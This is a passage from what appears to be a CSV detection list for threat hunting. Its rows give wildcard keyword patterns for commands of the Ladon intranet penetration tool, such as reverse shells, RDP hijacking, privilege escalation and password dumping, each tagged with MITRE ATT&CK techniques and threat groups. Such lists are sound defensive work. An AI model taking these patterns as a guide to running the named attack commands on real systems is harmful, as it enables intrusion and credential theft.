- T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon GetDomainIP*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon gethtml *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon GetPipe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon GetSystem*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon IISdoor*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon IISpwd*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon MssqlCmd *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon netsh *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon noping *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon Open3389*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon PowerCat *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon PrintNightmare*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon psexec*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon QueryAdmin*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon RdpHijack*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon ReadFile *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon RegAuto*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon ReverseHttps*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon ReverseTcp *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon RevShell-*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon 